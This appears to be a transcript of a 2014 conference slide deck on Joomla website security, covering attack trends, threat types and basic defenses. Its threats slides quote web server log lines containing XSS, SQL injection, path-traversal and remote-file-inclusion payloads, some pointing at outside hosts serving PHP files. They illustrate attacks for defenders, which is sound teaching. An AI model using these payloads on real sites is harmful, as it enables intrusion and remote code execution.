Joomla! Day Atlanta 2014 - Website Security - The Basics
-
Upload
tony-perez -
Category
Technology
-
view
1.857 -
download
0
description
Transcript of Joomla! Day Atlanta 2014 - Website Security - The Basics
Setting The FoundationJoomla Website Security
04/11/2023
# WHOIS PEREZBOX
Organization Sucuri, Inc. Co-Founder Chief Operating Officer @sucuri_security @perezbox
Specialization: Website Security Incident Handling Log Analysis
Special Interests: Working Out Brazilian JiuJitsu
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 2
04/11/2023
Website Security Company
Global Operations
Platform Agnostic (i.e., Joomla, WordPress, etc..)
Scan 2M Unique Domains a Month
Block 4M web attacks a Month
Remediate 400 – 500 websites a day
Signature / Heuristic Based
24/7 operations
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 3
04/11/2023
Today’s Discussion
Trends Threats Defenses
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 4
SIMPLE RIGHT?
04/11/2023
Trends
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 5
04/11/2023
Explosion in Web Malicious Links
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 6
Malicious Links
20112012
600%
04/11/2023
Malicious Links?
Tony Perez | @perezbox | @sucuri_security |#JoomlaDayAtlanta 7
Malicious
Links
Social Media
Email Links Website
Text Messag
es
04/11/2023
The Web Is The Source
Known MalwareUnkown Malware
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8
90%
04/11/2023
What’s a Good Host?
Not InfectedInfected
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 9
85%
04/11/2023
Malware Type Distribution
Remot
e iF
ram
e In
cludes
Remot
e Ja
vaScr
ipt In
cludes
SPAM In
ject
ions
Obfu
scat
ed /
Enco
ded Ja
vaScr
ipt
Condit
ional
Red
irec
ts
Def
acem
ents
Oth
er
26%
19%16%
14%11%
4%
10%
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 10
9 Million Unique Domains Scanned
-19 % Infected
04/11/2023
Moving Beyond WordPress
Tony Perez | @perezbox | @sucuri_security | #wordsesh 11
Apache
SSH Email Server
Going Deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a changes a lot
04/11/2023
Exploiting Forms
Stick With Reputable Sources
Generating SPAM emails, resource hogs
IP blacklisting
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 12
04/11/2023
Spear Phishing / Phishing Increase
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 13
55% of Companies have fallen victim
04/11/2023
Search Engine Poisoning (SEP)
Pharmacy Payday Loans
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 14
04/11/2023
Automated Attacks
Administrator
Templates / Extensions Payload
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 15
Exploiting Access Control Brute Force Attacks
04/11/2023
Cross-Site Contamination
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 16
Site 1
Site 2Site 3
Site 4
04/11/2023
iFrame Injections
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 17
04/11/2023
Drive By Downloads
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 18
04/11/2023
Targeting Zero Days
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 19
04/11/2023
Targeting Mobile Devices
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 20
04/11/2023
Google is On Fire
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 21
04/11/2023
Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 22
04/11/2023
Denial of Service (DOS)
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 23
04/11/2023
Brute Force vs Denial of Service
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 24
04/11/2023
Exploiting Trust
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 25
04/11/2023
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade Yes, pay someone to hack
for you
Different tools to break in and generate payloads Brute force and
vulnerability exploits Malware Payloads
Blackhole Exploit Kit – Today’s market leader 2013 – SophoLabs
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 26
04/11/2023
Don’t Worry, Everyone is a Target
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 27
04/11/2023
Threats
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 28
04/11/2023
Anatomy of Web Attacks
Recon Identify Attack Decisions Sustain
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 29
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
04/11/2023
Cross-Site Scripting (XSS)
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 30
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored Reflective
04/11/2023
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI)
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 31
04/11/2023
SQL Injection
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 32
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
04/11/2023
Spear Phishing
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 33
04/11/2023
Backdoors
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 34
04/11/2023
Free is not always Free
http://forum.joomla.org/viewtopic.php?t=795946
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 35
- Autson Skitter Slideshow (mod_AutsonSlideShow)The malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShare This)The malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)The malicious code is located in the "tmpl" folder, in the php file(s).
04/11/2023
What’s all this mean?
Brand Reputation Legal Implications Impact to Sales Blacklisted by
Search Engines Blacklisted by
Payment processors Worst Day Of your
Life
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 36
04/11/2023
Defenses
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 37
04/11/2023
The Foundation
Sucuri properties suffer: ~125,000 web
based attacks a month on average
~4,000 attacks a day▪ This spikes on occasion
Doesn’t include server level attacks
All flavors of attacksTony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 38
04/11/2023
Areas to Focus On
Principles Access Control Vulnerabilities
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 39
04/11/2023
Manage your expectations
“It’s about risk reduction… risk will never be zero…”
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 40
04/11/2023
Defense in Depth
“…a concept in which multiple layers of security controls (defenses) are placed throughout an information
technology (IT) system. Its intent is to provide redundancy in the event a
security control fails or a vulnerability is exploited…”
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 41
04/11/2023
Access
Passwords
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 42
Complex – Long - Unique
04/11/2023
Principle of Least Privileged
“requires that in a particular abstraction layer of a computing
environment, every module (such as a process, a user or a program
depending on the subject) must be able to access only the information
and resources that are necessary for its legitimate purpose.”
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 43
04/11/2023
Stay Informed - Vulnerabilities
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 44
04/11/2023
Disable PHP Execution
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 45
PHP Execution, disable it:
Cache Tmp Modules Components Images
http://blog.sucuri.net/2013/08/joomla-media-manager-attacks-in-the-wild.html
<Files *.php>Deny from all</Files>
04/11/2023
Please Backup
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 46
04/11/2023
Stay Current (Update)
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 47
04/11/2023
Website Application Firewalls
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 48
04/11/2023
Biggest Weakness / Vulnerability
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 49
04/11/2023
10 Stupid Administrator Tricks1. Fix index.php file and assume all is fine.
2. Panic your way into Joomla! Forums after hack.
3. Don’t worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on live site.
6. Install and forget, all is well with your new site.
7. Use the same username and password for everything.
8. Don’t waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 50
04/11/2023
Notable Resources
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 51
Name Tool
Sucuri Blog http://blog.sucuri.net
Sucuri TV http://sucuri.tv
Malware Scanner http://sitecheck.sucuri.net
Malware Scanner http://unmaskparasites.com
Badware Busters https://badwarebusters.org
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
Joomla! Security and Performance FAQs
http://docs.joomla.org/Security_and_Performance_FAQs
Joomla! Security Checklist http://docs.joomla.org/Security_Checklist/Getting_Started
04/11/2023
Questions?
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 52